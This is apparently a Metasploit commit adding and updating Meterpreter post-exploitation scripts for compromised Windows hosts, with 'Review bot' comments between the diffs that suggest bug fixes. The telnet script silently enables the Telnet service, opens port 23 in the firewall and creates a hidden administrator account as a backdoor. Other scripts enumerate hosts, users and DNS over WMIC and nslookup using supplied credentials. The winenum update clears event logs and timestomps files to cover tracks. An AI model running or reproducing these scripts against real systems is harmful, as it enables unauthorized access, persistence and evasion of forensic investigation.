New scripts and updated scripts from Carlos Perez

git-svn-id: file:///home/svn/framework3/trunk@6202 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2009-01-30 06:18:02 +00:00
parent f927320eda
commit e6ef0ab495
4 changed files with 519 additions and 17 deletions


@ -0,0 +1,201 @@
#!/usr/bin/env ruby
#
#Meterpreter script for enabling Telnet Server on Windows 2003, Windows Vista
#Windows 2008 and Windows XP targets using native windows commands.
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
#Verion: 0.1.1
#Note: If the Telnet Server is not installed in Vista or win2k8
# it will be installed.
################## Variable Declarations ##################
session = client
@@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help menu." ],
"-e" => [ false, "Enable Telnet Server only." ],
"-p" => [ true, "The Password of the user to add." ],
"-u" => [ true, "The Username of the user to add." ]
)
def checkifinst(session)
r = session.sys.process.execute("sc query state= all",nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
if d =~ (/TlntSvr/)
return true
end
end
r.channel.close
r.close
end
#-------------------------------------------------------------------------------
def winver(session)
stringtest = ""
verout = []
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
while(d = r.channel.read)
stringtest << d
end
r.channel.close
r.close
verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/)
version = nil
if verout[0] == "6"
if verout[1] == "0"
version = "Windows Vista/Windows 2008"
elsif verout[1] == "1"
version = "Windpows 7"
end
elsif verout [0] == "5"
if verout[1] == "0"
version = "Windows 2000"
elsif verout[1] == "1"
version = "Windows XP"
elsif verout[1] == "2"
version = "Windows 2003"
end
end
version
end
#---------------------------------------------------------------------------------------------------------
def insttlntsrv(session)
trgtos = winver(session)
if trgtos =~ /(Windows Vista)/
if checkifinst(session)
print_status("Telnet Service Installed on Target")
else
print_status("Installing Telnet Server Service ......")
session.response_timeout=90
r = session.sys.process.execute("pkgmgr /iu:\"TelnetServer\"",nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
r.channel.close
r.close
end
end
end
#---------------------------------------------------------------------------------------------------------
def enabletlntsrv(session)
tmpout = [ ]
cmdout = []
key2 = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\TlntSvr"
root_key2, base_key2 = session.sys.registry.splitkey(key2)
value2 = "Start"
begin
open_key = session.sys.registry.open_key(root_key2, base_key2, KEY_READ)
v2 = open_key.query_value(value2)
print_status "Setting Telnet Server Services service startup mode"
if v2.data != 2
print_status "\tThe Telnet Server Services service is not set to auto, changing it to auto ..."
cmmds = [ 'sc config TlntSvr start= auto', "sc start TlntSvr", ]
cmmds. each do |cmd|
r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
end
else
print_status "\tTelnet Server Services service is already set to auto"
end
#Enabling Exception on the Firewall
print_status "\tOpening port in local firewall if necessary"
r = session.sys.process.execute('netsh firewall set portopening protocol = tcp port = 23 mode = enable', nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
rescue::Exception => e
print_status("The following Error was encountered: #{e.class} #{e}")
end
end
#---------------------------------------------------------------------------------------------------------
def addrdpusr(session, username, password)
tmpout = [ ]
cmdout = []
print_status "Setting user account for logon"
print_status "\tAdding User: #{username} with Password: #{password}"
begin
r = session.sys.process.execute("net user #{username} #{password} /add", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
print_status "\tAdding User: #{username} to local group TelnetClients"
r = session.sys.process.execute("net localgroup \"TelnetClients\" #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
print_status "\tAdding User: #{username} to local group Administrators"
r = session.sys.process.execute("net localgroup Administrators #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
print_status "You can now login with the created user"
rescue::Exception => e
print_status("The following Error was encountered: #{e.class} #{e}")
end
end
#---------------------------------------------------------------------------------------------------------
def message
print_status "Windows Telnet Server Enabler Meterpreter Script"
end
def usage
print(
"Windows Telnet Server Enabler Meterpreter Script\n" +
"Usage: getgui -u <username> -p <password> \n" +
@@exec_opts.usage
)
end
################## MAIN ##################
# Parsing of Options
usr = nil
pass = nil
lport = nil
enbl = nil
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-u"
usr = val
when "-p"
pass = val
when "-h"
usage
break
when "-n"
lport = val.to_i
when "-e"
enbl = 1
end
}
if enbl == 1
message
insttlntsrv(session)
enabletlntsrv(session)
elsif usr!= nil && pass != nil
message
insttlntsrv(session)
enabletlntsrv(session)
addrdpusr(session, usr, pass)
else
usage
end
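Review bot: `insttlntsrv` appends to `tmpout` in its read loop but never initialises it, so the install branch raises NameError as soon as `pkgmgr` returns any output, and with no rescue in that function the script aborts before `enabletlntsrv` runs; add `tmpout = ""` as the first line of the function. `winver` takes `verout` from `stringtest.scan(...)`, which returns an empty array when the `ver` output does not match, so `verout` is nil and `verout[0]` raises; add `return nil if verout.nil?` before the comparisons, and make the same change in the copies of `winver` this commit adds to two other scripts. `checkifinst` returns from inside the loop without closing `r.channel` and `r`. `addrdpusr` echoes the password in its status line, and the `-n` branch of the option parser has no matching entry in `@@exec_opts`; the first deserves a comment and the second can be removed.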


@ -4,7 +4,7 @@ require 'ftools'
#Meterpreter script for ping sweeps on Windows 2003, Windows Vista
#Windows 2008 and Windows XP targets using native windows commands.
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
#Verion: 0.1.1
#Verion: 0.1.2
#Note:
################## Variable Declarations ##################
@@exec_opts = Rex::Parser::Arguments.new(
@ -15,7 +15,8 @@ require 'ftools'
"-fl" => [ false, "To Perform DNS Forward Lookup on host list and domain"],
"-hl" => [ true, "File with Host List for DNS Forward Lookup"],
"-d" => [ true, "Domain Name for DNS Forward Lookup"],
"-st" => [ false, "To Perform DNS lookup of MX, NS and SOA records for a domain"]
"-st" => [ false, "To Perform DNS lookup of MX and NS records for a domain"],
"-sr" => [ false, "To Perform Service Record DNS lookup for a domain"]
)
session = client
@ -38,12 +39,14 @@ dest = logs + "/" + host + filenameinfo
def stdlookup(session,domain,dest)
dest = dest + "-general-record-lookup.txt"
print_status("Getting MX and NS Records for Domain #{domain}")
filewrt(dest,"MX and NS Records for Domain #{domain}")
filewrt(dest,"SOA, NS and MX Records for Domain #{domain}")
types = ["SOA","NS","MX"]
mxout = []
results = []
garbage = []
types.each do |t|
begin
r = session.sys.process.execute("nslookup -query=mx #{domain}", nil, {'Hidden' => true, 'Channelized' => true})
r = session.sys.process.execute("nslookup -type=#{t} #{domain}", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
mxout << d
end
@ -51,17 +54,19 @@ def stdlookup(session,domain,dest)
r.close
results = mxout.to_s.split(/\n/)
results.each do |rec|
if rec =~ /(Name:)/ or rec =~ /(Address:)/ or rec =~ /(Server:)/
garbage << rec
else
print_status("\t#{rec}")
filewrt(dest,"#{rec}")
end
if rec.match(/\s*internet\saddress\s\=\s/)
garbage << rec.split(/\s*internet\saddress\s\=/)
print_status("#{garbage[0].to_s.sub(" "," ")} #{t} ")
filewrt(dest,garbage[0].to_s.sub(" "," ")+" #{t} ")
garbage.clear
end
garbage.clear
end
rescue ::Exception => e
print_status("The following Error was encountered: #{e.class} #{e}")
end
end
end
#-------------------------------------------------------------------------------
# Function for writing results of other functions to a file
@ -215,6 +220,39 @@ def pingsweep(session,iprange,dest)
end
end
#-------------------------------------------------------------------------------
#Function for enumerating srv records
def srvreclkp(session,domain,dest)
dest = dest + "-srvenum.txt"
srout = []
garbage = []
srvrcd = [
"_gc._tcp.","_kerberos._tcp.", "_kerberos._udp.","_ldap._tcp.","_test._tcp.",
"_sips._tcp.","_sip._udp.","_sip._tcp.","_aix._tcp.","_aix._tcp.","_finger._tcp.",
"_ftp._tcp.","_http._tcp.","_nntp._tcp.","_telnet._tcp.","_whois._tcp."]
print_status("Performing SRV Record Enumeration for #{domain}")
filewrt(dest,"SRV Record Enumeration for #{domain}")
srvrcd.each do |srv|
r = session.sys.process.execute("nslookup -query=srv #{srv}#{domain}", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
srout << d
end
r.channel.close
r.close
results = srout.to_s.split(/\n/)
results.each do |rec|
if rec.match(/\s*internet\saddress\s\=\s/)
garbage << rec.split(/\s*internet\saddress\s\=/)
print_status("\tfor #{srv}#{domain} #{garbage[0].to_s.sub(" "," ")}")
filewrt(dest,"for #{srv}#{domain} #{garbage[0].to_s.sub(" "," ")}")
garbage.clear
end
garbage.clear
srout.clear
end
end
end
#-------------------------------------------------------------------------------
#Function to print message during run
def message(dest)
print_status "Network Enumerator Meterpreter Script "
@ -231,10 +269,12 @@ frdlkp = nil
dom = nil
hostlist = nil
helpcall = nil
srvrc = nil
# Parsing of Options
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-sr"
srvrc = 1
when "-rl"
rvrslkp = 1
when "-fl"
@ -249,6 +289,7 @@ helpcall = nil
hostlist = val
when "-r"
range = val
when "-h"
print(
"Network Enumerator Meterpreter Script\n" +
@ -270,7 +311,11 @@ elsif dom != nil && hostlist!= nil && frdlkp == 1
message(logs)
frwdlp(session,hostlist,dom,dest)
elsif dom != nil && stdlkp == 1
message(logs)
stdlookup(session,dom,dest)
elsif dom != nil && srvrc == 1
message(logs)
srvreclkp(session,dom,dest)
elsif helpcall == nil
print(
"Network Enumerator Meterpreter Script\n" +
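Review bot: In `stdlookup` the `mxout` buffer is created once before `types.each` and no visible line clears it between iterations, so on the later passes `results` still holds the earlier nslookup output and those address lines would be printed and logged again under the wrong record type; initialise it inside the loop instead (`mxout = []` as the first statement of the `types.each` block). One line of the function falls between the two hunks and is not shown, so confirm nothing clears the buffer there. The status line still reads "Getting MX and NS Records" and one of the two printed `-st` help strings says "MX and NS", while the `types` array also lists SOA; the wording should match what is queried. In `srvreclkp`, `srout.clear` sits inside `results.each`; moving it to the end of the `srvrcd.each` body would make the per-query reset explicit.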


@ -0,0 +1,210 @@
#!/usr/bin/env ruby
#
#Meterpreter script for basic enumeration of Windows 2003, Windows Vista
# and Windows XP remote targets using native windows command wmic.
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
#Verion: 0.1.1
#Note:
################## Variable Declarations ##################
session = client
# Variables for Options
helpcall = 0
rusr = nil
rpass = nil
trg = ""
# Script Options
@@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help menu."],
"-t" => [ true, "The target address"],
"-u" => [ true, "User on the target system (If not provided it will use credential of process)"],
"-p" => [ true, "Password of user on target system"]
)
# Create Filename info to be appended to downloaded files
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
# Create a directory for the logs
logs = ::File.join(Msf::Config.config_directory, 'logs', 'remotewinenum')
# Create the log directory
::FileUtils.mkdir_p(logs)
# WMIC Commands that will be executed on the Target
wmic = [
'environment list',
'share list',
'nicconfig list',
'computersystem list',
'useraccount list',
'group list',
'sysaccount list',
'volume list brief',
'service list brief',
'process list brief',
'startup list full',
'rdtoggle list',
'qfe list'
]
################## Function Declarations ##################
# Function for running a list of WMIC commands stored in a array, returs string
def wmicexec(session,wmic,user,pass,trgt)
print_status("Running WMIC Commands ....")
tmpout = ''
command = nil
runfail = 0
runningas = session.sys.config.getuid
begin
tmp = session.fs.file.expand_path("%TEMP%")
# Temporary file on windows host to store results
wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt"
wmic.each do |wmi|
if user == nil
print_status("The commands will be ran under the credentials of #{runningas}")
command = "/node:#{trgt} /append:#{wmicfl} #{wmi}"
else
command = "/user:#{user} /password:#{pass} /node:#{trgt} /append:#{wmicfl} #{wmi}"
end
print_status "\trunning command wimic #{wmi}"
r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
sleep(1)
r = session.sys.process.execute("cmd.exe /c echo Output of wmic #{wmi} from #{trgt} >> #{wmicfl}",nil, {'Hidden' => 'true'})
sleep(1)
r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
sleep(1)
#print_status "\twmic #{command}"
r = session.sys.process.execute("cmd.exe /c wmic #{command}", nil, {'Hidden' => true})
sleep(2)
r.close
end
# Read the output file of the wmic commands
wmioutfile = session.fs.file.new(wmicfl, "rb")
until wmioutfile.eof?
tmpout << wmioutfile.read
end
# Close output file in host
wmioutfile.close
rescue ::Exception => e
print_status("Error running WMIC commands: #{e.class} #{e}")
end
# We delete the file with the wmic command output.
c = session.sys.process.execute("cmd.exe /c del #{wmicfl}", nil, {'Hidden' => true})
c.close
tmpout
end
#-------------------------------------------------------------------------------
# Function for writing results of other functions to a file
def filewrt(file2wrt, data2wrt)
output = ::File.open(file2wrt, "a")
data2wrt.each do |d|
output.puts(d)
end
output.close
end
#------------------------------------------------------------------------------
# Function to generate report header
def headerbuid(session,target,dest)
# Header for File that will hold all the output of the commands
info = session.sys.config.sysinfo
header = "Date: #{::Time.now.strftime("%Y-%m-%d.%H:%M:%S")}\n"
header << "Running as: #{client.sys.config.getuid}\n"
header << "From: #{info['Computer']}\n"
header << "OS: #{info['OS']}\n"
header << "Target: #{target}\n"
header << "\n\n\n"
print_status("Saving report to #{dest}")
header
end
#------------------------------------------------------------------------------
def winver(session)
stringtest = ""
verout = []
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
while(d = r.channel.read)
stringtest << d
end
r.channel.close
r.close
verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/)
version = nil
if verout[0] == "6"
if verout[1] == "0"
version = "Windows Vista/Windows 2008"
elsif verout[1] == "1"
version = "Windpows 7"
end
elsif verout [0] == "5"
if verout[1] == "0"
version = "Windows 2000"
elsif verout[1] == "1"
version = "Windows XP"
elsif verout[1] == "2"
version = "Windows 2003"
end
end
version
end
#------------------------------------------------------------------------------
# Function Help Message
def helpmsg
print(
"Remote Windows Enumeration Meterpreter Script\n" +
"This script will enumerate windows hosts in the target enviroment\n" +
"given a username and password or using the credential under witch\n" +
"Meterpeter is running using WMI wmic windows native tool.\n" +
"Usage:\n" +
@@exec_opts.usage
)
end
################## MAIN ##################
localos = winver(session)
# Check that the command is not being ran on a Win2k host
# since wmic is not present in Windows 2000
if localos =~ /(Windows 2000)/
print_status("This script is not supported to be ran from Windows 2000 servers!!!")
else
# Parsing of Options
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-t"
trg = val
when "-u"
rusr = val
when "-p"
rpass = val
when "-h"
helpmsg
helpcall = 1
end
}
#logfile name
dest = logs + "/" + trg + filenameinfo
# Executing main logic of the script
if helpcall == 0 and trg != ""
# Making sure that is running as System a Username and Password for target machine must be provided
if session.sys.config.getuid == "NT AUTHORITY\\SYSTEM" && rusr == nil && rpass == nil
print_status("Stopped: Running as System and no user provided for connecting to target!!")
else trg != nil && helpcall != 1
filewrt(dest,headerbuid(session,trg,dest))
filewrt(dest,wmicexec(session,wmic,rusr,rpass,trg))
end
elsif helpcall == 0 and trg == ""
helpmsg
end
end
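Review bot: `filenameinfo` is built with `strftime("%Y%m%d.%M%S")`, which leaves out the hour, so reports started in different hours of the same day can share a name and `filewrt`, which opens in append mode, would merge them; use `"%Y%m%d.%H%M%S"`. In the main block, `else trg != nil && helpcall != 1` is a plain `else` followed by an expression whose value is discarded, so the condition is never tested; write `else` on its own or turn it into an `elsif`. `wmicexec` places the account password on the wmic command line through `/password:#{pass}`, where process-creation auditing on the host would record it; a comment above that line should say so, so that credentials used with this script are treated as exposed after a run.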


@ -3,7 +3,7 @@
#Meterpreter script for basic enumeration of Windows 2000, Windows 2003, Windows Vista
# and Windows XP targets using native windows commands.
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
#Verion: 0.3.2
#Verion: 0.3.4
#Note: Compleatly re-writen to make it modular and better error handling.
# Working on adding more Virtual Machine Checks and looking at improving
# the code but retain the independance of each module so it is easier for
@ -33,13 +33,18 @@ commands = [
'ipconfig /displaydns',
'route print',
'net view',
'netstat -na',
'netstat -nao',
'netstat -vb',
'netstat -ns',
'net accounts',
'net accounts /domain',
'net session',
'net share',
'net group',
'net user',
'net localgroup',
'net localgroup administrators',
'net group administrators',
'net view /domain',
'netsh firewall show config',
'tasklist /svc'
@ -62,11 +67,12 @@ cmdstomp = [
wmic = [
'computersystem list',
'useraccount list',
'group',
'group list',
'service list brief',
'volume list brief',
'process list brief',
'startup list full',
'rdtoggle list',
'qfe',
]
#Specific Commands for Windows vista for Wireless Enumeration
@ -84,6 +90,12 @@ nonwin2kcmd = [
'wbem\\wmic.exe',
'netsh.exe',
]
# Executables not pressent in Windows 2000
nowin2kexe = [
'netsh.exe',
'tasklist.exe',
'wbem\\wmic.exe',
]
################## Function Declarations ##################
# Function to check if Target Machine a VM
@ -357,7 +369,7 @@ end
def covertracks(session,cmdstomp)
clrevtlgs(session)
info = session.sys.config.sysinfo
trgtos = info['OS']
trgtos = winver(session)
if trgtos =~ /(Windows 2000)/
chmace(session,cmdstomp - nonwin2kcmd)
else
@ -488,6 +500,36 @@ def killApp(session,procpid)
session.sys.process.kill(procpid)
print_status("Old process #{procpid} killed.")
end
#-------------------------------------------------------------------------------
def winver(session)
stringtest = ""
verout = []
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
while(d = r.channel.read)
stringtest << d
end
r.channel.close
r.close
verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/)
version = nil
if verout[0] == "6"
if verout[1] == "0"
version = "Windows Vista/Windows 2008"
elsif verout[1] == "1"
version = "Windpows 7"
end
elsif verout [0] == "5"
if verout[1] == "0"
version = "Windows 2000"
elsif verout[1] == "1"
version = "Windows XP"
elsif verout[1] == "2"
version = "Windows 2003"
end
end
version
end
#---------------------------------------------------------------------------------------------------------
# Function to execute process migration
@ -537,7 +579,7 @@ if helpopt != 1
header << "Host: #{info['Computer']}\n"
header << "OS: #{info['OS']}\n"
header << "\n\n\n"
trgtos = info['OS']
trgtos = winver(session)
print_status("Saving report to #{dest}")
filewrt(dest,header)
filewrt(dest,chkvm(session))
@ -566,7 +608,11 @@ if helpopt != 1
end
if (cm != nil)
filewrt(dest,"EventLogs where Cleared")
covertracks(session,cmdstomp)
if trgtos =~ /(Windows 2000)/
covertracks(session,cmdstomp - nowin2kexe)
else
covertracks(session,cmdstomp)
end
end
print_status("Done!")
end
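Review bot: The new `nowin2kexe` list repeats entries already in `nonwin2kcmd` (`netsh.exe`, `wbem\\wmic.exe`), and the Windows 2000 filtering now happens in two places: at the call site with `cmdstomp - nowin2kexe` and again inside `covertracks` with `cmdstomp - nonwin2kcmd`; keep one list and filter in one place. `nonwin2kcmd` appears to be a script-level local (it shows up as the hunk-header context `nonwin2kcmd = [`), which a `def` body cannot see, so confirm how `covertracks` resolves that name. After this change `info = session.sys.config.sysinfo` in `covertracks` is no longer used and can be dropped. Both `covertracks` and the main block continue outside the hunks shown.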